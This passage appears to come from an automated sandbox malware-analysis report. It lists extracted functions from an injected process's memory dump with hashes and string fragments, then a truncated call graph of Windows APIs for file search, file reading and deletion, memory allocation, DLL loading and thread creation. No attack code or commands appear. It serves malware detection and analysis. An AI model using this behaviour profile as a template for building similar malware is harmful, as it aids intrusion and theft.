                            • Instruction ID: 1ead985058d289a0b605b2df5cea8d815e995dac462d8646afa9de551ddea8ee
                            • Opcode Fuzzy Hash: 3852e79e17c48379d9ad5b2161431157d1c952dcb5cffdf614c41a5ee6ef4212
                            • Instruction Fuzzy Hash: 1921DDB0C05288ABDB21DFE4D6406CEBFB5AB05300F619498D42A7F201D3B64656DF99
                            Function 038A05B5 Relevance: 15.2, Strings: 12, Instructions: 234COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                            • API String ID: 0-2356907671
                            • Opcode ID: d75e6810ccb86ad79996ab7035fc94ff22432196dc995dadb1b35aaac5eb0711
                            • Instruction ID: 704401e74d8d7ad0d7b3033c9df8f566b1cda2202b89948c8c4d1006d3950fb2
                            • Opcode Fuzzy Hash: d75e6810ccb86ad79996ab7035fc94ff22432196dc995dadb1b35aaac5eb0711
                            • Instruction Fuzzy Hash: 6E8182B6C00319AADB54EFE98C82FEE777DAF44300F0445D9B509AB241EB759748CB62
                            Function 038A05BA Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                            • API String ID: 0-2356907671
                            • Opcode ID: 149a16010500139d9d436a1dc1a119daa5cef789cc9b64cf38b2dd6800caacd8
                            • Instruction ID: 3f5749edd155b468fbe9f2e7dc75e3058d8be92f86d229ab14361776884d9b1b
                            • Opcode Fuzzy Hash: 149a16010500139d9d436a1dc1a119daa5cef789cc9b64cf38b2dd6800caacd8
                            • Instruction Fuzzy Hash: 0D8182B6C00319AADB54EFE98C81FEE777DAF44300F0445D9A509AB241EB759748CB62
                            Function 0389941A Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                            • API String ID: 0-685823316
                            • Opcode ID: c25da520458c369c887f2e2dd66b6d7d00856533b7e501059864a00bcd2ead24
                            • Instruction ID: a0a068e51a958b07ca67b43a934e67d762847bb217df5008c693b17381e4fb5a
                            • Opcode Fuzzy Hash: c25da520458c369c887f2e2dd66b6d7d00856533b7e501059864a00bcd2ead24
                            • Instruction Fuzzy Hash: C82173B5D40318AAEF50DFD4CC45BEEBBB9FF04704F04859DE609BA180DBB516488BA5
                            Function 03899413 Relevance: 13.8, Strings: 11, Instructions: 83COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                            • API String ID: 0-685823316
                            • Opcode ID: 850dc37d872b6546c7fc49366672feb755d763ddd058aba8623d623ce433d9e9
                            • Instruction ID: edb5c76ca5c84ea8bd3812b470232b7447535019e0178faec84e2c139ffc73d9
                            • Opcode Fuzzy Hash: 850dc37d872b6546c7fc49366672feb755d763ddd058aba8623d623ce433d9e9
                            • Instruction Fuzzy Hash: 532191B5D40318AAEF40DFD4CC85BEEBBB9FF08700F10815DE605BA280DBB516488BA5
                            Function 038A9D8A Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :$:$:$A$I$N$P$m$s$t
                            • API String ID: 0-2304485323
                            • Opcode ID: dc12b6e269656847754e4e185b53525f40734d060571d09f87ebaec4cc50839c
                            • Instruction ID: 0a50b09dbd47c08b1fbf8b90e4d7e8bbcc8e8121304aa62b10770b26d19564e6
                            • Opcode Fuzzy Hash: dc12b6e269656847754e4e185b53525f40734d060571d09f87ebaec4cc50839c
                            • Instruction Fuzzy Hash: D6D10CB6900706AFDB14DFE9CC81FEEB3B9AF48700F048559E509DB241EB78A901CB65
                            Function 038A9D85 Relevance: 12.7, Strings: 10, Instructions: 212COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :$:$:$A$I$N$P$m$s$t
                            • API String ID: 0-2304485323
                            • Opcode ID: 67d18e62faadc960299bd786c378f0f369bc654b5b59371a8c98e15a52cfb8f4
                            • Instruction ID: 0b7cc250567c87d3e176a2ac6e23f972024dfa3a842e87510b75a74077d501b5
                            • Opcode Fuzzy Hash: 67d18e62faadc960299bd786c378f0f369bc654b5b59371a8c98e15a52cfb8f4
                            • Instruction Fuzzy Hash: 9F813AB6900709AFDB14DFE9CC81BEEB7B8AF48300F04455DE509EB241EB75A905CB65
                            Function 03891E2A Relevance: 12.5, Strings: 10, Instructions: 43COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #$,$3$B$W$]$_$o$t$~
                            • API String ID: 0-1062738339
                            • Opcode ID: 26a6d07bb24566bbd7015fe2ccce93f787f2317cd2da544ba77b4e5309e11138
                            • Instruction ID: ed82c493caa8a1048616020ef4f36eac2b3f45dc429a3d1c5d38c28d6cfa322d
                            • Opcode Fuzzy Hash: 26a6d07bb24566bbd7015fe2ccce93f787f2317cd2da544ba77b4e5309e11138
                            • Instruction Fuzzy Hash: DB11A910D0C7CAD9DF12C6BC84086AEBF715F23218F4882D9D5A46A2D6C2B94745DBA6
                            Function 038ACCBA Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: L$S$\$a$c$e$l
                            • API String ID: 0-3322591375
                            • Opcode ID: ac12fab6f62cdad86f8d98d351e8aa7c9385d95f600b2fb8691e93dcd13606fe
                            • Instruction ID: e16e6f941afdbecd2fa24867ce318ee37f3d49b6fdabb5879d39ec9ba3558512
                            • Opcode Fuzzy Hash: ac12fab6f62cdad86f8d98d351e8aa7c9385d95f600b2fb8691e93dcd13606fe
                            • Instruction Fuzzy Hash: D241B672C10618AADB10DFE9DC85BEEB7B8EF48310F05469AE80DEB200EB7159418B91
                            Function 038A50AA Relevance: 7.7, Strings: 6, Instructions: 168COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: F$P$T$f$r$x
                            • API String ID: 0-2523166886
                            • Opcode ID: b3a5041f6e71055b8f460448eef001ea320efdc9a513109f813f55a9725dad71
                            • Instruction ID: db4b5312373abb11cf30c7b11d9a87b1b496a32e72545e72f78ccccb39b56b25
                            • Opcode Fuzzy Hash: b3a5041f6e71055b8f460448eef001ea320efdc9a513109f813f55a9725dad71
                            • Instruction Fuzzy Hash: E85108B1940705AAE734DFFDCC44BEAF7B8EF06700F044A9DA549DA181D7B46588CBA2
                            Function 038A50A8 Relevance: 7.5, Strings: 6, Instructions: 36COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: F$P$T$f$r$x
                            • API String ID: 0-2523166886
                            • Opcode ID: 38442e069684cc53b011d857f6d59629ea1da265b3529461c4f782261268e0fc
                            • Instruction ID: 57136658ab2fdc8cb4963c0fe49d1c9d8c73f0fefdfa1afb4f929ed7011fd926
                            • Opcode Fuzzy Hash: 38442e069684cc53b011d857f6d59629ea1da265b3529461c4f782261268e0fc
                            • Instruction Fuzzy Hash: 8DF0A970D10208AADF20DFE988456DE7F75FF45354F118559D8057F200E7B64A09CB91
                            Function 038A47FA Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $i$l$o$u
                            • API String ID: 0-2051669658
                            • Opcode ID: 63358360ba81b06a206af14ba81e70728f24b9884c38e3993032ae3463ac3c91
                            • Instruction ID: fd54a1f82dfaad2465167e6943c10d9424f67b2729cd5595ed678d92cee695fb
                            • Opcode Fuzzy Hash: 63358360ba81b06a206af14ba81e70728f24b9884c38e3993032ae3463ac3c91
                            • Instruction Fuzzy Hash: CE616FB5900704AFDB24DBE9CC80FEFB7FDAB48710F144599E51AE7240E674AA41CB61
                            Function 038A47F6 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $i$l$o$u
                            • API String ID: 0-2051669658
                            • Opcode ID: df53b1ed3f098613c79eb776eb188df2138ddd8c2b0cf477d926944dd1d20725
                            • Instruction ID: 6a55795e3f3fc1dd201cc62d1274750169c3496fe096f70ba7b0d5e5b536be91
                            • Opcode Fuzzy Hash: df53b1ed3f098613c79eb776eb188df2138ddd8c2b0cf477d926944dd1d20725
                            • Instruction Fuzzy Hash: 7A413CB5900708AFDB60DFA9C884FEEBBF9EB48700F144599E519E7240E770AA45CB61
                            Function 038A449A Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$k$o
                            • API String ID: 0-3624523832
                            • Opcode ID: 2ef9d573dcce042a7a98ceb7b2879d306c066e9fa6af543c5ece590cb7904b0e
                            • Instruction ID: 67dea4e54bbb4de748181c9418025224d97824cc8f21aeae69810b6dba2c2aba
                            • Opcode Fuzzy Hash: 2ef9d573dcce042a7a98ceb7b2879d306c066e9fa6af543c5ece590cb7904b0e
                            • Instruction Fuzzy Hash: 82B1EAB5A00708AFDB24DBE9CC85FEFB7BDAB88700F148558F619E7240D675AA41CB50
                            Function 038A4D9A Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$h$o
                            • API String ID: 0-3662636641
                            • Opcode ID: 7a6988ed2e6b5493e568f869ea586036ada396f423ea8f7ecef1f475e21a182c
                            • Instruction ID: 96b1aedf75be1153b230c66a248a15aafd9e5798f9b6eb0ab7dc429564515601
                            • Opcode Fuzzy Hash: 7a6988ed2e6b5493e568f869ea586036ada396f423ea8f7ecef1f475e21a182c
                            • Instruction Fuzzy Hash: 977150B69002197EDF64DBA9CC81FEE737CEF45300F0445DAB549AA141EE745B848BA3
                            Function 038A448D Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$k$o
                            • API String ID: 0-3624523832
                            • Opcode ID: e9d9d9869231d2fd2950291d32f5dd560bb2c2c5d0c10c8616a7f97c7e2c8623
                            • Instruction ID: aa4dffdb6f7c5b035fde864824258332252eac922519d27b01bc99181790cd18
                            • Opcode Fuzzy Hash: e9d9d9869231d2fd2950291d32f5dd560bb2c2c5d0c10c8616a7f97c7e2c8623
                            • Instruction Fuzzy Hash: BD612CB5A00744AFDB54DFE9C884FEFB7B9AF88710F148558E619AB280D770AA41CB50
                            Function 038A435A Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                            • API String ID: 0-2877786613
                            • Opcode ID: 21b107fc5fb91ac30048b0e3e04ff8e13eb37171f1d5cb5b4ad2e2d5483b7fe7
                            • Instruction ID: 7afd3432a3b7efd57ca9d17cee4f1d2f1f0937435f78470248b8750e7389b6ab
                            • Opcode Fuzzy Hash: 21b107fc5fb91ac30048b0e3e04ff8e13eb37171f1d5cb5b4ad2e2d5483b7fe7
                            • Instruction Fuzzy Hash: 58312C655116197AEB11EFD98C42FEF763CEF99600F004088F604AB285DBB46A0187B6
                            Function 038A4D8F Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$h$o
                            • API String ID: 0-3662636641
                            • Opcode ID: ec25a038ba3a7e437abec8d02256385a3ac28ec0802d386b4b9b85636ba9a05b
                            • Instruction ID: 62f629c3faf026840a7d9756aba14ae9e29c158be3feabad39098f709c099190
                            • Opcode Fuzzy Hash: ec25a038ba3a7e437abec8d02256385a3ac28ec0802d386b4b9b85636ba9a05b
                            • Instruction Fuzzy Hash: 97417BB6D00319AEDF54DBA98C41FEE73B8EF45300F0045DAA549EA141EB745B848FA3
                            Function 038A08EA Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -$1$H$z
                            • API String ID: 0-597413025
                            • Opcode ID: 6efce32b47a5f49168df9b0e71d1f4c068d1529213493792c62424b7437620e8
                            • Instruction ID: 36f446f004357d400554c0108464c1847198f8fee8df77491b6928e5b4f71556
                            • Opcode Fuzzy Hash: 6efce32b47a5f49168df9b0e71d1f4c068d1529213493792c62424b7437620e8
                            • Instruction Fuzzy Hash: 043141B5910209ABEB04DFD8CC41BFE77B8EF04304F048599E908EB241E7759A058BA5
                            Function 038A1D32 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$k$o
                            • API String ID: 0-3624523832
                            • Opcode ID: d429f07d0ce086e2d587b1470e61241a51a75309d5db5534d11573799d0f3c72
                            • Instruction ID: 536cb7e0916a34fc0bf2370b146e61b35922a5163ddaf523cc86066cd17628bc
                            • Opcode Fuzzy Hash: d429f07d0ce086e2d587b1470e61241a51a75309d5db5534d11573799d0f3c72
                            • Instruction Fuzzy Hash: E711E5B2900318AFDB14DFD9D885ADEF7B9FF04304F048259E909AF201E771A944CBA1
                            Function 038A1D3A Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$k$o
                            • API String ID: 0-3624523832
                            • Opcode ID: f2621c03fbd4d716db99724f868d4045e5b659438e6041147a25d1979a321a89
                            • Instruction ID: 902c92bc8f514c9e76efe7e462b87094efc9e5c8efb1414fbeaa896ff4ad12ad
                            • Opcode Fuzzy Hash: f2621c03fbd4d716db99724f868d4045e5b659438e6041147a25d1979a321a89
                            • Instruction Fuzzy Hash: 4C01C4B2900308ABDB14DFD9D885ADEF7B9FF08314F048259E919AF201E771A945CBA0

                            Execution Graph

                            Execution Coverage:2.6%
                            Dynamic/Decrypted Code Coverage:4.2%
                            Signature Coverage:1.5%
                            Total number of Nodes:457
                            Total number of Limit Nodes:72
                            execution_graph 95633 282b880 95635 282b8a9 95633->95635 95634 282b9ad 95635->95634 95636 282b953 FindFirstFileW 95635->95636 95636->95634 95637 282b96e 95636->95637 95638 282b994 FindNextFileW 95637->95638 95638->95637 95639 282b9a6 FindClose 95638->95639 95639->95634 95640 282f240 95641 282f25d 95640->95641 95644 2823e40 95641->95644 95643 282f27b 95645 2823e64 95644->95645 95646 2823ea0 LdrLoadDll 95645->95646 95647 2823e6b 95645->95647 95646->95647 95647->95643 95648 2825180 95653 2837090 95648->95653 95652 28251cb 95654 28370aa 95653->95654 95662 48c2c0a 95654->95662 95655 28251b6 95657 2837a90 95655->95657 95658 2837b11 95657->95658 95659 2837ab1 95657->95659 95665 48c2e80 LdrInitializeThunk 95658->95665 95659->95652 95660 2837b42 95660->95652 95663 48c2c1f LdrInitializeThunk 95662->95663 95664 48c2c11 95662->95664 95663->95655 95664->95655 95665->95660 95666 28303c1 95678 2837880 95666->95678 95668 28303e2 95669 2830400 95668->95669 95670 2830415 95668->95670 95671 2837a00 NtClose 95669->95671 95682 2837a00 95670->95682 95673 2830409 95671->95673 95674 283044a 95675 283041e 95675->95674 95685 28398d0 95675->95685 95679 2837919 95678->95679 95681 28378a1 95678->95681 95680 283792f NtReadFile 95679->95680 95680->95668 95681->95668 95683 2837a1d 95682->95683 95684 2837a2e NtClose 95683->95684 95684->95675 95688 2837d50 95685->95688 95687 283043e 95689 2837d6a 95688->95689 95690 2837d7b RtlFreeHeap 95689->95690 95690->95687 95691 2837040 95692 283705a 95691->95692 95695 48c2df0 LdrInitializeThunk 95692->95695 95693 2837082 95695->95693 95701 2830bc0 95702 2830bcf 95701->95702 95703 2830c13 95702->95703 95706 2830c54 95702->95706 95708 2830c59 95702->95708 95704 28398d0 RtlFreeHeap 95703->95704 95705 2830c23 95704->95705 95707 28398d0 RtlFreeHeap 95706->95707 95707->95708 95714 28204cb PostThreadMessageW 95715 28204dd 95714->95715 95716 2819450 95717 281945f 95716->95717 95718 28194a0 95717->95718 95719 281948d CreateThread 95717->95719 95720 2826410 95721 282643a 95720->95721 95724 2827370 95721->95724 95723 2826464 95725 282738d 95724->95725 95731 2837180 95725->95731 95727 28273e4 95727->95723 95728 28273dd 95728->95727 95736 2837250 95728->95736 95730 282740d 95730->95723 95732 283720d 95731->95732 95734 28371a1 95731->95734 95741 48c2f30 LdrInitializeThunk 95732->95741 95733 2837246 95733->95728 95734->95728 95737 28372ef 95736->95737 95738 2837271 95736->95738 95742 48c2d10 LdrInitializeThunk 95737->95742 95738->95730 95739 2837334 95739->95730 95741->95733 95742->95739 95743 283aa10 95744 28398d0 RtlFreeHeap 95743->95744 95745 283aa25 95744->95745 95746 2834a10 95747 2834a6a 95746->95747 95749 2834a77 95747->95749 95750 28325b0 95747->95750 95757 2839840 95750->95757 95752 28325f1 95753 2823e40 LdrLoadDll 95752->95753 95755 28326e7 95752->95755 95756 283262e 95753->95756 95754 2832661 Sleep 95754->95756 95755->95749 95756->95754 95756->95755 95760 2837b50 95757->95760 95759 2839871 95759->95752 95761 2837bd7 95760->95761 95763 2837b71 95760->95763 95762 2837bed NtAllocateVirtualMemory 95761->95762 95762->95759 95763->95759 95764 48c2ad0 LdrInitializeThunk 95765 28220dc 95766 2822108 95765->95766 95769 2825960 95766->95769 95768 2822113 95771 2825993 95769->95771 95770 28259b7 95770->95768 95771->95770 95776 2837590 95771->95776 95773 28259da 95773->95770 95774 2837a00 NtClose 95773->95774 95775 2825a5a 95774->95775 95775->95768 95777 28375aa 95776->95777 95780 48c2ca0 LdrInitializeThunk 95777->95780 95778 28375d6 95778->95773 95780->95778 95781 281ae20 95782 281ae33 95781->95782 95783 2839840 NtAllocateVirtualMemory 95782->95783 95784 281c491 95783->95784 95785 282a0e0 95790 2829e10 95785->95790 95787 282a0ed 95806 2829ab0 95787->95806 95789 282a109 95791 2829e35 95790->95791 95818 2827790 95791->95818 95794 2829f72 95794->95787 95796 2829f89 95796->95787 95798 2829f80 95798->95796 95801 282a071 95798->95801 95833 2833910 95798->95833 95838 2829510 95798->95838 95800 2833910 GetFileAttributesW 95800->95801 95801->95800 95803 282a0c9 95801->95803 95847 2829870 95801->95847 95804 28398d0 RtlFreeHeap 95803->95804 95805 282a0d0 95804->95805 95805->95787 95807 2829ac6 95806->95807 95815 2829ad1 95806->95815 95808 28399b0 RtlAllocateHeap 95807->95808 95808->95815 95809 2829ae7 95809->95789 95810 2827790 GetFileAttributesW 95810->95815 95811 2829dde 95812 2829df7 95811->95812 95813 28398d0 RtlFreeHeap 95811->95813 95812->95789 95813->95812 95814 2833910 GetFileAttributesW 95814->95815 95815->95809 95815->95810 95815->95811 95815->95814 95816 2829510 RtlFreeHeap 95815->95816 95817 2829870 RtlFreeHeap 95815->95817 95816->95815 95817->95815 95819 28277a6 95818->95819 95820 28277b8 GetFileAttributesW 95819->95820 95821 28277c3 95819->95821 95820->95821 95821->95794 95822 2831e90 95821->95822 95823 2831e9e 95822->95823 95824 2831ea5 95822->95824 95823->95798 95825 2823e40 LdrLoadDll 95824->95825 95826 2831eda 95825->95826 95827 2831ee9 95826->95827 95854 2831960 LdrLoadDll 95826->95854 95832 2832084 95827->95832 95851 28399b0 95827->95851 95830 28398d0 RtlFreeHeap 95830->95832 95831 2831f02 95831->95830 95831->95832 95832->95798 95834 283396d 95833->95834 95835 28339a4 95834->95835 95858 28277e0 95834->95858 95835->95798 95837 2833986 95837->95798 95839 2829536 95838->95839 95863 282cd50 95839->95863 95841 282959d 95843 2829720 95841->95843 95844 28295bb 95841->95844 95842 2829705 95842->95798 95843->95842 95845 28293d0 RtlFreeHeap 95843->95845 95844->95842 95868 28293d0 95844->95868 95845->95843 95848 2829896 95847->95848 95849 282cd50 RtlFreeHeap 95848->95849 95850 2829912 95849->95850 95850->95801 95855 2837d00 95851->95855 95853 28399cb 95853->95831 95854->95827 95856 2837d1a 95855->95856 95857 2837d2b RtlAllocateHeap 95856->95857 95857->95853 95859 28277a6 95858->95859 95862 28277f8 95858->95862 95860 28277b8 GetFileAttributesW 95859->95860 95861 28277c3 95859->95861 95860->95861 95861->95837 95865 282cd66 95863->95865 95864 282cd73 95864->95841 95865->95864 95866 28398d0 RtlFreeHeap 95865->95866 95867 282cdac 95866->95867 95867->95841 95869 28293e6 95868->95869 95872 282cdc0 95869->95872 95871 28294ec 95871->95844 95873 282cde4 95872->95873 95874 282ce7c 95873->95874 95875 28398d0 RtlFreeHeap 95873->95875 95874->95871 95875->95874 95876 28267e0 95877 28267fc 95876->95877 95881 282684f 95876->95881 95879 2837a00 NtClose 95877->95879 95877->95881 95878 2826975 95880 2826817 95879->95880 95886 2825bf0 NtClose LdrInitializeThunk LdrInitializeThunk 95880->95886 95881->95878 95887 2825bf0 NtClose LdrInitializeThunk LdrInitializeThunk 95881->95887 95883 282694f 95883->95878 95888 2825dc0 NtClose LdrInitializeThunk LdrInitializeThunk 95883->95888 95886->95881 95887->95883 95888->95878 95889 282e960 95890 282e9c4 95889->95890 95891 2825960 2 API calls 95890->95891 95893 282eaed 95891->95893 95892 282eaf4 95893->95892 95918 2825a70 95893->95918 95895 282ec93 95896 282eb70 95896->95895 95897 282eca2 95896->95897 95922 282e740 95896->95922 95898 2837a00 NtClose 95897->95898 95900 282ecac 95898->95900 95901 282eba5 95901->95897 95902 282ebb0 95901->95902 95903 28399b0 RtlAllocateHeap 95902->95903 95904 282ebd9 95903->95904 95905 282ebe2 95904->95905 95906 282ebf8 95904->95906 95907 2837a00 NtClose 95905->95907 95931 282e630 CoInitialize 95906->95931 95909 282ebec 95907->95909 95910 282ec06 95933 28374e0 95910->95933 95912 282ec82 95913 2837a00 NtClose 95912->95913 95914 282ec8c 95913->95914 95915 28398d0 RtlFreeHeap 95914->95915 95915->95895 95916 282ec24 95916->95912 95917 28374e0 LdrInitializeThunk 95916->95917 95917->95916 95919 2825a95 95918->95919 95937 2837390 95919->95937 95923 282e75c 95922->95923 95924 2823e40 LdrLoadDll 95923->95924 95926 282e77a 95924->95926 95925 282e783 95925->95901 95926->95925 95927 2823e40 LdrLoadDll 95926->95927 95928 282e84e 95927->95928 95929 2823e40 LdrLoadDll 95928->95929 95930 282e8ab 95928->95930 95929->95930 95930->95901 95932 282e695 95931->95932 95932->95910 95934 28374fd 95933->95934 95942 48c2ba0 LdrInitializeThunk 95934->95942 95935 283752d 95935->95916 95938 28373ad 95937->95938 95941 48c2c60 LdrInitializeThunk 95938->95941 95939 2825b09 95939->95896 95941->95939 95942->95935 95943 2836ee0 95944 2836f64 95943->95944 95945 2836f04 95943->95945 95948 48c2ee0 LdrInitializeThunk 95944->95948 95946 2836f95 95948->95946 95954 2837720 95955 28377c9 95954->95955 95957 2837745 95954->95957 95956 28377df NtCreateFile 95955->95956 95958 2837960 95959 28379cc 95958->95959 95961 2837984 95958->95961 95960 28379e2 NtDeleteFile 95959->95960 95964 2822a6c 95969 28271c0 95964->95969 95967 2837a00 NtClose 95968 2822a91 95967->95968 95970 28271da 95969->95970 95974 2822a7c 95969->95974 95975 2837130 95970->95975 95973 2837a00 NtClose 95973->95974 95974->95967 95974->95968 95976 283714d 95975->95976 95979 48c35c0 LdrInitializeThunk 95976->95979 95977 28272aa 95977->95973 95979->95977 95980 28194b0 95981 28198f7 95980->95981 95983 2819ddb 95981->95983 95984 2839560 95981->95984 95985 2839586 95984->95985 95990 2813e40 95985->95990 95987 2839592 95989 28395c0 95987->95989 95993 2834050 95987->95993 95989->95983 95997 2822b70 95990->95997 95992 2813e4d 95992->95987 95994 